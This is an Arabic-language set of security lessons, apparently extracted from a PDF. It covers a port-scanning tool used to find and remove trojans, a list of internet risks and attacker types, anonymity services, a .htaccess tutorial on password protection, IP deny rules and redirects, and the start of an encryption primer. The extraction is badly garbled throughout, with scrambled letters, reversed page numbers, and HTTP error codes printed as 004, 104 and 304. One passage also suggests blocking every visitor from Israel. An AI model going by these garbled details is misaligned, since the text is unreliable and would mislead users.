الدخول بواسطتة الى‬ ‫له‪ ‬‬ ‫القدرة على فحص اي برنامج مع إعطاء معدل الشتباه ه‬ ‫الذاكرة‪ ‬‬ ‫ة‬ ‫القدرة علىاغلق اي برنامج مخفي في‬ ‫الفعالة‪ ‬‬ ‫ة‬ ‫القدرة على فحص ملفات التجسس غیر‬ ‫التسجیل‪ ‬‬ ‫ل‬ ‫اظهار الملفات الموجودة في قائمة التشغیل داخل ملف‬ ‫المخفیة‪ ‬‬ ‫ة‬ ‫امكانیة اظهار جمیع النوافذ بمافیها‬ ‫نبدأ بشرح موجز الله وباالله التوفیق ‪ ..‬‬ ‫الرحیم‪ ‬‬ ‫م‬ ‫بسم االله الرحمن‬ ‫البرنامج‪ ‬‬ ‫ج‬ ‫واجهة‬ ‫االنتیجة‪ ‬‬ ‫ة‬ ‫الن لضغط على رز أبد ً للبدأ بعملیة فحص المنافذ وانتظر‬ ‫اا‪ ‬‬ ‫الفحص‪ ‬‬ ‫ص‬ ‫مثال للنتیجة التي تظهر بعد عملیة‬ ‫‪ 691‬‬ ‫ولحظ ظهور هذا المنفذ ‪ 0005‬وهو منفذ خطیر وللمعلومیة فهو موجود بأي نظام ویندوز میلینیوم‪ ‬‬ ‫و‬ ‫أو‬ ‫ت‪ ‬‬ ‫‪ xp‬كذلك بل إن ویندوز ‪ xp‬به منافذ أكثر هدیة من مایكروسوفت‬ ‫‪ 0005‬‬ ‫‪0‬‬ ‫ومبینة خطورة منفذ‬ ‫هذا المنفذ یستخدم بواسطة برنامج التجسس ‪ Bubbel‬وایضا برنامج ‪ Sockets de Troie‬یستطیع اي‬ ‫ي‬


‫شخص یمتكلك هذا البرنامج الدخول الى جهازك ورؤیة جمیع ملفاتك والتحكم في جمیع عملیاته‪ .‬‬ ‫وللمعاومیة فاسم الملف الذي یقوم بفتح هذا البورت هو ‪ SSDPSRV.EXE‬‬ ‫موجود في مجلد‪ SYSTEM‬في الویندوز‪ ‬‬ ‫ولعل بعض المنافذ ل یستطیع البرنامج ذكر وصف عنها إما لحداثتها أو لعدم المعرفة الكافیة عن‪ ‬‬ ‫هذا‬ ‫البورت ولعلنا نتعرض في دروس قائمة لتفصیلت عن البورتات یمكن الرجوع إلیها فحال وجود‪ ‬‬ ‫قصور في برامج كشف البورتات عن ذكر تفصیلت عنها‪ ‬‬ ‫الن الخطوة التالیة إضغط على زر تشغیل محرك الذكاء الصطناعي‪ ‬‬ ‫سیظهر لك هذا التحذیر‪ ‬‬ ‫في حال تنفیذك للشروط أختر خیار جمیع الشروط قد نفذت أبدأ‪ ‬‬ ‫الن اختر زر جمع المعلومات وانتظر حتى ینتهي البرنامج من عملیة جمع المعلومات عن المنافذ‪ ‬‬ ‫المفتوحة والملفات المتسببة في ذلك ‪ .‬‬ ‫ثم اضغط على زر إبدا التنفیذ لتظهر لك النتیجة‪ ‬‬ ‫الن اختر زر حذف من التشغیل لحذف الملفات المتسببة في فتح المنافذة السابقة الذكر والتي‪ ‬‬ ‫ظهرت‬ ‫معنا بالصورة السابقة‪ ‬‬ ‫‪ 791‬‬ ‫الن یستحسن إعادة تشغیل جهازك وبعد إعادة التشغیل إعمل عملیة فحص مرة أخرى للتأكد من‬ ‫نجاح‬ ‫العملیة وبالتوفیق إن شاء االله ‪ .‬‬ ‫وصلى االله وسلم وبارك على نبینا محمد وعلى آله وصحبه أجمعین‪ ‬‬ ‫‪ 891‬‬ ‫السریة في النترنت‪ ‬‬ ‫النترنت عبارة عن بحر مفتوح من عملیات الكومبیوتر وعلى ذلك فهي معرضة للكثیر من المخاطر‪ ‬‬ ‫المتعلقة بسریة المعلومات لذلك فبمجرد اتصالك بالنترنت فأنت معرض لعملیة الختراق وسرقة‪ ‬‬ ‫ی (أو بالحرى‪ ‬‬ ‫البیانات وبما أن النترنت لیس لها مالك او حاكم حتى هذه اللحظة وتدیر نفسها تلقائ ً‬ ‫ا‪ ‬‬ ‫نحن المستخدمین الذین ندیرها)؛ فیجب أن نعلم أنه إذا لم نستطع نحن سكان عالم النترنت أن‬ ‫نحكمها‬ ‫بعقلنیة فسیأتي الیوم الذي تتدخل الجهات الحكومیة لدارتها!‪ ‬‬ ‫مخاطر النترنت المحتملة‪ ‬‬ ‫سرقة المعلومات‪ ‬‬ ‫اعتراض رسائل البرید اللكتروني وقراءتها‪ .‬‬ ‫اختراق أجهزة الغیر والطلع على المعلومات الموجودة فیها أو تغییرها‪ .‬‬ ‫سرقة أرقام بطاقات الئتمان والرقام السریة الخرى‪ .‬‬ ‫تعطیل نظام التشغیل‪ ‬‬ ‫ارسال فیروسات تتسبب في اعطال أیً كانت‪ .‬‬ ‫ا‪ ‬‬ ‫مسح نظام التشغیل أو حذف ملفات نظام‪ .‬‬ ‫وجود مواقع غیر مناسبة‪ ‬‬ ‫مواقع إباحیة‪ .‬‬ ‫مواقع منافیة للدین‪ .‬‬ ‫مواقع وصفات صناعة متفجرات‪ .‬‬ ‫‪ 991‬‬ ‫أعداء النترنت‪ ‬‬ ‫المتطفلون ‪ Hackers‬‬ ‫المتطفل هو الشخص الذي یشعر بالفخر لمعرفته بأسالیب عمل النظام أو الشبكات بحیث یسعى‬ ‫للدخول‬ ‫علیها بدون تصریح‪ ،‬وهؤلء الشخاص عاد ً ل یتسببون بأي أضرار مادیة‪ .‬‬ ‫ة‪ ‬‬


‫‪ Crackers‬‬ ‫‪C‬‬ ‫ن‬ ‫المخربون‬ ‫الشخاص‪ ‬‬ ‫ص‬ ‫المخرب هو الشخص الذي یحاول الدخول على أنظمة الكمبیوتر دون تصریح‪ ،‬وهؤلء‬ ‫المتطفلین‪ .‬‬ ‫‪.‬‬ ‫عاد ً ما یتسببون في أضرار مادیة بعكس‬ ‫ة‪ ‬‬ ‫ة‬ ‫‪ Viruses‬‬ ‫‪V‬‬ ‫ت‬ ‫الفیروسات‬ ‫الفیروس هو برنامج یكرر نفسه على نظام الكمبیوتر عن طریق دمج نفسه في البرامج الخرى‪ ،‬‬ ‫ا‬ ‫وكما‬ ‫أن الفیروسات خطیرة للنسان لدرجة أنها قد تقضي علیه؛ فالفیروسات االتي نتحدث عنها قد‪ ‬‬ ‫ي‬ ‫تقضي‬ ‫س مثل‪ ‬‬ ‫على الكمبیوتر‪ ،‬وقد تأتي في مختلف الشكال والحجام بل أن بعضها ل یسمى فیرو ً‬ ‫د‬ ‫الدود‬ ‫اا‪ ‬‬ ‫‪Worms‬وأحصنة طروادة ‪ Trojan Horses‬وبعض الفیروسات لیست خطیرة وإنما مزعجة‪ ..‬‬ ‫الفیروسات‪ ‬‬ ‫ت‬ ‫بعض التصرفات التي قد تجلب‬ ‫سلمتها‪ .‬‬ ‫‪.‬‬ ‫تشغیل البرامج من النترنت دون فحصها والتأكد من‬ ‫سلمتها‪ .‬‬ ‫‪.‬‬ ‫تشغیل البرامج من أقراص دون فحصها والتأكـد من‬ ‫المهمة‪ .‬‬ ‫‪.‬‬ ‫عدم وضع نسخ احتیاطیة للمعلومات‬ ‫منه‪ .‬‬ ‫‪.‬‬ ‫عدم وجود مضاد جید للفیروسات أو عدم وجود نسخة جدیدة‬ ‫الفیروسات‪ ‬‬ ‫ت‬ ‫الحمایة من‬ ‫یجب أن ل تبالغ في إجراءات الحمایة ضد الفیروسات‪ ،‬كما یجب أل تتهاون فیها‪ ،‬بحیث ل إفراط ول‪ ‬‬ ‫‪N‬‬ ‫‪Norton AntiVirus‬‬ ‫تفریط ‪.‬المر المهم أن یكون لدیك برنامج مضاد فیروسات ممتاز كبرنامج ‪0.5‬‬ ‫ب‪ ‬‬ ‫وتأكد من تحدیثه بصورة دوریة من موقع الشركة المنتجة ‪ www.norton.com .‬اعتبر ‪ -‬من باب‬ ‫الحمایة ‪ -‬أن جمیع البرامج التي تنزلها من النترنت أو من القراص ملغومة بالفیروسات ولذلك‪ ‬‬ ‫م‬ ‫قم‬ ‫‪ 002‬‬ ‫بفحصها قبل تشغیلها واعلم أن النظام الوحید المن ‪ %001‬هو المكتوب بالید أو المحفوظ في‪ ‬‬ ‫ة‬ ‫الذاكرة‬ ‫م بنسخ بدیلة للمعلومات المهمة ‪..‬وضع في ذهنك أن درهم وقایة خیر من قنطار علج‪ .‬‬ ‫واحتفظ دائ ً‬ ‫اا‪ ‬‬ ‫‪ Spoofing‬‬ ‫‪S‬‬ ‫ة‬ ‫المحاكاة‬ ‫المحاكاة هو مصطلح یطلق على عملیة انتحال شخصیة للدخول الى النظام‪ .‬حزم الـ ‪ IP‬تحتوي‪ ‬‬ ‫ى‬ ‫على‬ ‫عناوین لل ُر ِل وال ُر َل إلیه وهذه العناوین ینظر إلیها على أنها عناوین مقبولة وساریة المفعول من‪ ‬‬ ‫س‪ ‬‬ ‫مس‬ ‫مس‬ ‫فإن‪ ‬‬ ‫قبل البرامج وأجهزة الشبكة‪ ،‬ومن خلل طریقة تعرف بمسارات المصدر ‪ Source Routing‬ن‬ ‫حزم الـ ‪ IP‬قد یتم إعطائها شك ً تبدو معه وكأنها قادمة من كمبیوتر معین بینما هي في الحقیقة‪ ‬‬ ‫ت‬ ‫لیست‬ ‫ل‪ ‬‬ ‫ل‬ ‫قادمة منه‪ ،‬وعلى ذلك فإن النظام إذا وثق ببساطة بالهویة التي یحملها عنوان مصدر الحزمة فإنه‬ ‫ن‬ ‫یكون‬ ‫بذلك قد حوكي ( ُ ِع)‪ .‬البرید اللكتروني یمكن أیض ً أن یخدع بسهولة ولكن النظام المؤمن بشكل‬ ‫د‬ ‫جید‬ ‫خد‪ ‬‬ ‫د‬ ‫ا‬ ‫‪ Source routed‬‬ ‫‪S‬‬ ‫م بالحركة المس ّرة من قبل المصدر‪.‬‬ ‫ل یثق بهذه المصادر ول یسمح عمو ً‬ ‫اا‪ ‬‬ ‫ی‬ ‫النترنت‪ ‬‬ ‫ت‬ ‫بعض خیارات الحمایة في‬ ‫بالنترنت‪ .‬‬ ‫‪.‬‬ ‫عدم الرتباط‬ ‫‪ (Authentication‬‬ ‫(‬ ‫التوثیق‪(.‬‬ ‫‪ (Encryption‬‬ ‫(‬ ‫التشفیر‪(.‬‬ ‫‪ (Firewalls‬‬ ‫(‬ ‫جدران النار‪(.‬‬


‫‪ 102‬‬ ‫ی في النترنت؟‪ ‬‬ ‫هل یمكن أن تتجول متخف ً‬ ‫ا‪ ‬‬ ‫الجواب نعم ول‪ ،‬وإلیكم القصة‪ ‬‬ ‫توجد على شبكة إنترنت عدة مواقع تؤمن لك سریة تحركاتك‪ .‬فموقع‪ ‬‬ ‫‪ )(www.anonymizer.com‬‬ ‫مث ً‪ ،‬یوفر لك من خلل خدمة إمكانیة إخفاء رقم البي عن المواقع التى ترغب في ل‪ ‬‬ ‫زیارته‪ ،‬‬ ‫ویوصلك إلیه‪ ،‬بدون أن یم ّنه من تسجیل أي معلومات حقیقیة عنك‪ ،‬حیث سیبدو للموقع‪ ‬‬ ‫ك‪ ‬‬ ‫ی‪ ،‬‬ ‫الذي تزوره‪ ،‬أنك قادم من عنون اخر وتقدم هذه الخدمة إما مجا ً‬ ‫ن بسرعة بطیئة نسب ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫ض‪ ،‬إمكانیة إخفاء‪ ‬‬ ‫أو بمقابل مع سرعة جیدة‪ ،‬ومزایا أفضل خدمات ویوفر الموقع‪ ،‬أی ً‬ ‫ا‪ ‬‬ ‫هویتك عن مزود ‪ .‬إنترنت‪ ،‬الذي تشترك لدیه‪ ،‬من خلل خدمة اخر یعود تصرفاتك على‪ ‬‬ ‫الشبكة‪ ،‬باستخدام تقنیات تشفیر متطورة (‪ 821‬بت)‪ ،‬فل ‪ .‬تش ّر هذه الخدمة‪ ،‬كل مزود‪ ‬‬ ‫ف‪ ‬‬ ‫الخدمة‪ ،‬قادًر على معرفة أسماء المواقع التي تزورها‪ ،‬أو الكلمات التي تبحث عنها‪ ،‬‬ ‫ا‪ ‬‬ ‫ض‪ ،‬سریة إرسال رسائل البرید اللكتروني‪ ،‬والدردشة عبر إنترنت‪ .‬‬ ‫وتضمن‪ ،‬أی ً‬ ‫ا‪ ‬‬ ‫موقع آخر شهیر في هذا المجال‪ ،‬ننصحك بزیارته‪ ،‬هو‪ ‬‬ ‫‪ )(www.ultimate­anonymity.com‬‬ ‫د‪ ،‬تبلغ ‪ 41‬دولًر‪ ،‬تدفع مرة واحدة فقط‪ .‬‬ ‫یقدم هذا الموقع خدماته بأسعار زهیدة ج ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫وتوفر بعض البرمجیات المجانیة‪ ،‬مثل‪ ‬‬ ‫‪ Ghost Mail‬‬ ‫إمكانیة إرسال رسائل إلكترونیة بدون الكشف عن عنوان البي‪ ‬‬ ‫الخاص بالكمبیوتر المتصل‪ .‬تستطیع جلب البرنامج من الموقع‪ ‬‬ ‫‪ )(www.er.uqam.ca/merlin/fg591543/gm‬‬ ‫هل یضمن الشتراك بالخدمات المذكورة‪ ،‬إخفاء هویتك‪ ،‬بشكل كامل‪ ،‬وأنت تبحر في إنترنت؟‬ ‫ل‪ ،‬فالجهة الوسیطة‪ ،‬التي تقدم لك هذه الخدمات‪ ،‬تحتفظ بسجل عن كافة تحركاتك‪ ،‬لكنها‪ ‬‬ ‫ل تكشفه‪ ،‬إل في حال وقع اعتداء معین‪ ،‬مصدره الكمبیوتر التي تستخدمه‪ ،‬كأن ترسل‪ ‬‬ ‫رسائل تهدید إلى الخرین‪ ،‬أو قنابل بریدیة‪ ،‬أو تقوم بتصرفات أخرى تخالف القوانین‪ ‬‬ ‫المریكیة‪ ،‬وهي البلد الذي توجد فیه تلك الجهات‪ ‬‬ ‫تسمح الخدمات السابقة‪ ،‬بتصفح المواقع التي یمنعها "البروكسي"‪ ،‬ویحتمل‪ ،‬لهذا السبب‪ ،‬‬ ‫أن یمنع بعض مزودي خدمات إنترنت في البلدان العربیة‪ ،‬الوصول إلى المواقع التي تقدم‪ ‬‬ ‫مثل هذه الخدمات ‪ .‬‬ ‫‪ 202‬‬ ‫ملف ‪ htaccess‬‬ ‫للكاتب‪ BSD­r00t:‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫| * مقدمـــة‪ ‬‬ ‫| * اهمیة ملف ‪ htaccess.‬‬ ‫| * كیفیة عمل ملف ‪ htaccess.‬‬ ‫| * عمل صفحات ‪ error‬خاصة‪ ‬‬ ‫| * منع عرض محتویات المجلد الذي ل یوجد به ‪ index‬‬ ‫| * منع‪/‬اتاحة دخول الموقع لشخاص معینة‪ ‬‬ ‫| * تحویل من یحاول فتح لینك للینك اخر‪ ‬‬ ‫| * عمل الملف ‪ .htpasswd‬‬


‫| *الحمایة بواسطه ‪ htaccess.‬‬ ‫| * منع اظهار الملف ‪ htaccess.‬‬ ‫| * اضافة مستخدمین في الملف‪ ‬‬ ‫| * جعل الصفحات تظهر بامتداد اخر‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫* مقدمـــة‪ ‬‬ ‫­­­­­­­­­­­­‪ ‬‬ ‫من اهم وسائل حمایة المواقع و اغلق بعض الجزاء فیه بكلمة سر ‪ ,‬و منع بعض الناس من دخل‬ ‫الموقع و السماح‪ ‬‬ ‫لغیرهم بالدخول ‪ ..‬هو استخدام الملف ‪ htaccess.‬و الذي یمكن عمل الكثیر و الكثیر به ‪ .‬‬ ‫و هذا الملف مخفي و محمي بكلمة سر‪ ‬‬ ‫* اهمیة ملف ‪ htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ -1‬حمایة اي جزء فیه بكملة سر‪ ‬‬ ‫‪ -2‬عمل صفحات ‪ error‬خاصة بك‪ ‬‬ ‫‪ -3‬منع عرض محتویات المجلد الذي ل یوجد به ‪ index‬‬ ‫‪ -4‬منع‪/‬اتاحة دخول الموقع لشخاص معینة‪ ‬‬ ‫‪ -5‬جعل صفحة البدایة بأمتدادات غیر ‪ .. html , .asp.‬‬ ‫‪ -6‬تحویل من یحاول فتح لینك للینك اخر‪ ‬‬ ‫‪ 302‬‬ ‫* كیفیة عمل ملف ‪ htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫یمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "‪ "Notepad‬عن طریق عمل‪ ‬‬ ‫للملف حفظ باسم و نحفظ‪ ‬‬ ‫الملف بهذا السم ‪ htacces.‬على ان یكون لیس امتداده ‪ txt.‬اي ان لیس هناك اسم للملف ‪ ,‬اذا‪ ‬‬ ‫لم‬ ‫تستطیع ذلك‪ ‬‬ ‫احفظ الملف باسم "‪ ­ "htaccess.‬علمتي التنصیص في اسم الملف ‪ . -‬‬ ‫* عمل صفحات ‪ error‬خاصة‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫و الفائدة منها هو ان الموقع یظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على‬ ‫الموقع‬ ‫سوف یظهر كان‪ ‬‬ ‫الموقع به كل الثغرات و ذلك لن طریقة عمل السكانر هي انه یقوم بتطبیق كل ثغره على الموقع‪ ‬‬ ‫و‬ ‫یرصد النتیجه‪ ‬‬ ‫فاذا كان هناك اي تغیر یظهر لك كأن الموقع علیه هذه الثغره ‪ .‬‬ ‫و یمكنك عمل صفحات ال ‪ error‬الخاصه ك عن طریق ‪ -:‬‬ ‫أ‪ -‬تصمیم صفحات ال ‪ error‬اول‪ ‬‬ ‫ب‪ -‬تحمیل الصفحات على الموقع‪ ‬‬ ‫ج‪ -‬اضافه السطر التابي في الملف ‪ htaccess.‬‬ ‫‪ ErrorDocument error_num directory_file‬‬ ‫بخیث یكون ‪ error_num‬هو رقم الخطا " الرقام موجود بالسفل " و ‪ directory_file‬هو مكان‪ ‬‬ ‫صفحه ال ‪ error‬التي‪ ‬‬ ‫قمت بتصمیمها ‪ .‬‬ ‫مثال ‪ :‬‬ ‫‪ ErrorDocument 404 /errors/nfound.html‬‬ ‫ال ‪ errors‬و ارقامها ‪ - :‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ | 004 | Bad Syntax‬‬


‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ | 104 | Unauthorized‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ | 204 | Not Used‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ 402‬‬ ‫‪ | 304 | Forbidden‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫‪ | 404 | Not Found‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫* منع عرض محتویات المجلد الذي ل یوجد به ‪ index‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫بعض المواقع عند محاولة فتح اي دلیل علیها و ل یكون به ملف ‪ index‬یقوم الموقع بسرد جمیع‪ ‬‬ ‫محتویات هذا الدلیل‪ ‬‬ ‫و لحل هذه المشكله توجد طریقتین ‪ -:‬‬ ‫أ‪ -‬وضع ملف ‪ index‬في كل المجلدات " و بالطبع هذا صعب جدا "‪ ‬‬ ‫ب‪ -‬باستخدام الملف ‪ htaccess.‬عن طریق اضافه السطر التالي في الملف ‪ -:‬‬ ‫‪ Options ­Indexes‬‬ ‫* منع‪/‬اتاحة دخول الموقع لشخاص معینة‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫یمكنك باستخدام الملف ‪ htaccess.‬منع شخص معین من دخول الموقع بعد معرفة الي بي الخاصه به‬ ‫و یمكنك التسفاده‪ ‬‬ ‫من ذلك حیث یمكنك منع دخل الموقع لمن ل ترید كما یمكنك منع دخول الموقع لي شخص في‪ ‬‬ ‫اسرائیل مثل ‪ ..‬‬ ‫و یمكنك ذلك عن طریق اضافة السطر التالي في الملف ‪ - :‬‬ ‫‪ ???.???.???.??? deny from‬‬ ‫حیث ان ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به ‪ .‬‬ ‫واذا اردت منع اي احد من دخول الموقع یمكنك اضافة السطر التالي ‪ -:‬‬ ‫‪ deny from all‬‬ ‫واذا اردت السماح لشخص معین بدخول الموقع یمكنك ذلك باضافة السطر التالي ‪ -:‬‬ ‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪ allow from‬‬ ‫حیث انا ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به‪ ‬‬ ‫* تحویل من یحاول فتح لینك للینك اخر‪ ‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫وتسمى هذه العملیه ب ‪ Redirection‬وهي من اهم فوائد ‪ htaccess.‬الملف تستخدم مثل عند تغیر‪ ‬‬ ‫موقع ملف قدیم‪ ‬‬ ‫‪ 502‬‬ ‫على الموقع الى مكان جدید فیمكنك باستخدام الملف ‪ htaccess.‬عند محاولة احد فتح احد الینك‬ ‫القدیم‬ ‫توجیه‪ ‬‬ ‫الى الینك الجدید عن طریق اضافة السطر التالي في الملف ‪ -:‬‬ ‫‪ ???.???/ ???.???/Redirect /somewhere‬‬ ‫‪ http://www.site.com/newlocation‬‬ ‫بحیث یكون ‪ ???.???/somewhere/‬هو مكان الملف القدیم و‪ ‬‬ ‫‪ ???.???/http://www.site.com/newlocation‬هو مكان‪ ‬‬ ‫الملف الجدید‪ .‬‬ ‫­­­­­­­­­­‪ ‬‬ ‫* عمل الملف ‪ .htpasswd‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ویمكنك تقوم بعمله بنفس طریقة الملف ‪ , htaccess.‬و سوف نعمله تى نسطیع استخدام الملف‪ ‬‬


‫‪ .htaccess‬‬ ‫في الحمایة و سوف نكتب في الملف ‪ htpasswd‬ما یأتي ‪ -:‬‬ ‫‪ 1user1:EncryptedPwd‬‬ ‫‪ 2user2:EncryptedPwd‬‬ ‫‪ o‬حیث ان ‪2 user1 , user‬هو اسم المستخدم ‪ .‬‬ ‫‪ o‬و ‪2 EncryptedPwd1 , EncryptedPwd‬هي كلمات السر ولكن مشفره و یمكنك تشفیر اي‪ ‬‬ ‫كلمة تریدها‪ ‬‬ ‫عن طریق الموقع‪ ‬‬ ‫‪ http://www.euronet.nl/~arnow/htpasswd‬‬ ‫او‪ ‬‬ ‫‪ http://www.e2.u­net.com/htaccess/make.htm‬‬ ‫فمثل لو اردنا وضع یوسر باسم ‪ Security‬و كلمة السر الخاصة به هي ‪3 fu93hds‬نذهب اول الى‬ ‫الموقع‪ ‬‬ ‫‪ http://www.euronet.nl/~arnow/htpasswd‬‬ ‫‪ o‬و ‪ username : Security‬‬ ‫‪ o‬و ‪ 3passwrod & re­enter password : fu93hds‬‬ ‫‪ o‬و نضغط على الزر ‪ claculate‬لتظهر النتیجه ‪ Security:893bNicBcwszw >--‬‬ ‫و الن قد اتممنا عمل الملف ‪ htaccess.‬و الذي قمنا بعمله و ذلك لكي نستطیع استخدام الملف‪ ‬‬ ‫‪ .htaccess‬‬ ‫للحمایة بكلمة سر و یوسر ‪ .‬‬ ‫‪ 602‬‬ ‫* الحمایة بواسطه ‪ htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫و تعتبر الفائدة الرئیسیة للملف حیث انه یمكن منع اي احد من دخول دلیل معین في الموقع ال اذا‪ ‬‬ ‫كان‬ ‫معه‪ ‬‬ ‫كلمة السر و الیوسر نیم ‪ ,‬فیمنكنك عن طریقها عمل منتدى خاص او اي شئ ترید‪ .‬‬ ‫فعند وضع الملف ‪ htaccess.‬في اي دلیل و حاول احد دخول هذا الدلیل او اي جزء یندرج تحته‪ ‬‬ ‫سوف یطلب منه‪ ‬‬ ‫كلمة سر و یوسر ‪ .‬‬ ‫و یمكنك عمل ذلك عن طریق اضافة ما یأتي في الملف قبل نسخه في الدلیل المراد‪ ‬‬ ‫حمایته ‪--:‬‬ ‫‪ AuthUserFile /somewhere/.htpasswd‬‬ ‫‪" AuthName "Enter your user and passed please‬‬ ‫‪ Require valid­user‬‬ ‫‪ AuthType Basic‬‬ ‫‪ ><Limit GET POST‬‬ ‫‪ require valid­user‬‬ ‫‪ >/<Limit‬‬ ‫‪ o‬بحیث یكون ‪ /somewhere/.htpasswd‬هو مكان ملف ‪ htpasswd.‬على موقعك‪ ‬‬ ‫‪ o‬و یكون ‪ Enter your user and passed please‬هي الرساله التي سوف تظهر لتطلب كلمة‪ ‬‬ ‫السر‪ ‬‬ ‫* منع اظهار الملف ‪ htaccess.‬‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫قد عرفنا الن ان لهذا الملف اهمیه كبیره فیجب علینا ان نحمیه جیدا ‪ ,‬فالبرغم من ان الملف‬ ‫مخفي ال‬ ‫انه غیر سالم من ان یكون السرفر نفسه غیر مؤمن او انه هناك تصریح خطأ ‪ ..‬‬ ‫لذلك سوف نمنع عرض هذا الملف عن طریق اضافة ما یأتي ‪ - :‬‬ ‫‪ ><Files .htaccess‬‬ ‫‪ order allow,deny‬‬


‫‪ deny from all‬‬ ‫‪ >/<Files‬‬ ‫‪ . error‬‬ ‫‪.‬‬ ‫فاذا حاول احد عرض الملف سوف یظهر له ‪304‬‬ ‫‪ 702‬‬ ‫اخر‪ ‬‬ ‫* جعل الصفحات تظهر بامتداد ر‬ ‫­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­­‪ ‬‬ ‫ویمكن باستخدام هذه الخاصیة عمل ملف یظهر كأن امتداده ‪ html.‬و لكنه ذو امتداد ‪ txt.‬مثل ‪ .‬‬ ‫‪ -:‬‬ ‫باضاف السطر التالي ‪-‬‬ ‫‪ AddType text/plain html‬‬ ‫‪ -:‬‬ ‫ویمكنك رؤیة كافى التغیرات التي یمكنك عملها في هذا الملف ‪-‬‬ ‫‪http://www.pharaonics.net/books/MIME.txt‬‬ ‫‪ 802‬‬ ‫التشفیر‪ ‬‬ ‫ر‬ ‫أساسیات‬ ‫الــ<>ــد<>ــر‪ ‬‬ ‫ر‬ ‫للكاتب‪:‬‬ ‫‪ PGP‬‬ ‫‪P‬‬ ‫انشاء االله بھذ الموضوع راح أوضح لكم كل شي عن التشفیر وماھي‬ ‫؟!‪ ‬‬ ‫وكیف تعمل !‬ ‫التشفیر‪ ‬‬ ‫ر‬ ‫وھ ذا الموضوع بكتبه بعد عدة قراءات قمت بھا عن علم‬ ‫‪ etc‬‬ ‫والطرق الي يقدر الشخص انه يقرى ملفاتك المشفرة‪e .‬‬ ‫‪ Paranoid‬‬ ‫‪P‬‬ ‫كل ‪ Hacker‬أو ‪ Paranoid‬وأظن الخ ‪ / DJ King‬تكلم عن‬ ‫ع‪ ‬‬ ‫والي اقوله ان كل شخص مثل ‪:Hacker‬يھتم بالتشفیر ويستخدمه لیمنع‬ ‫الخرين أو أي شخص كان من قراءة ملفاته وانشاء االله ابسط الفكرة في كیفیة‬ ‫ة‬ ‫‪ ...‬‬ ‫كسر التشفیر ‪.‬‬ ‫!!‪ ‬‬ ‫التشفیر وكیف يعمل !‬ ‫انك‪ ‬‬ ‫طبعا التشفیر كان يستخدم قديما والحین نشاھده في كل مكان لنفرض ك‬ ‫او‪ ‬‬ ‫شفت مثل فلم تجسس راح تلقي جھاز كومبیوتر اكید مع ملفات مشفرة و‬ ‫ه‪ ‬‬ ‫فلم عن ‪ Hackers‬راح تلقي بعد مايقضبون على المخترق ويوشوفون جھازه‬ ‫لیس‪ ‬‬ ‫يلقون اغلب الملفات مشفرة وھذا مايحدث الن وھو على وجه الواقعیة س‬ ‫الفلم!‪ ‬‬ ‫!‬ ‫فقط في‬ ‫لما يكون عندك ملف ‪ txt.‬تقدر تقراه يطلقون علیه مصطلح ‪ Plain text‬يعني نص‬ ‫ص‬ ‫قابل‪ ‬‬ ‫صافي او عادي لكن لما تستخدم التشفیر وتشفر الملف راح يصیر غیر ل‬ ‫ل‪ ‬‬ ‫للقراءة وھذا يطلق علیه مصطلح ‪ Cipher text‬يعني النص المشفر الغیر قابل‬ ‫للقراءة‪ ...‬‬ ‫‪.‬‬ ‫مثال‪ :‬‬ ‫‪:‬‬ ‫وھذا‬ ‫‪Plain text ==>Encryption==>Ciphertext==>Descryption==>Plaintext‬‬ ‫حیث‪ :‬‬ ‫‪:‬‬ ‫المثال ھ ذا يوضح لما تشفر ملف وتفكه من التشفیر ‪/‬‬ ‫ي‪ ‬‬ ‫= ‪Plain text‬النص العادي‬ ‫ص‪ ‬‬ ‫= ‪Encryption‬تشفیر النص‬ ‫ر‪ ‬‬ ‫= ‪Cipher text‬نص مشفر‬ ‫ر‪ ‬‬ ‫= ‪Descryption‬فك تشفیر النص المشفر‬ ‫ي‪ ‬‬ ‫= ‪Plain text‬عودة الملف إلى نص عادي‬ ‫‪ 902‬‬ ‫‪ PGP‬‬ ‫‪P‬‬ ‫علم التشفیر و @‪....‬‬ ‫ذا‪ ‬‬ ‫علم التشفیر ھو علم يستخدم الرياضیات لتشفیر وفك تشفیر البیانات ‪ .‬ھ ا‬ ‫العلم يفیدك في إنك تجعل من ملفاتك آمنة حتى مع شبكة النترنت الغیر آمنة‬ ‫ة‬ ‫‪ .‬‬ ‫منه‪ .‬‬ ‫‪.‬‬ ‫علم التشفیر احیانا يكون قوي او ضعیف ‪ .‬وأكید حنا نحتاج لتعلم القوي‬ 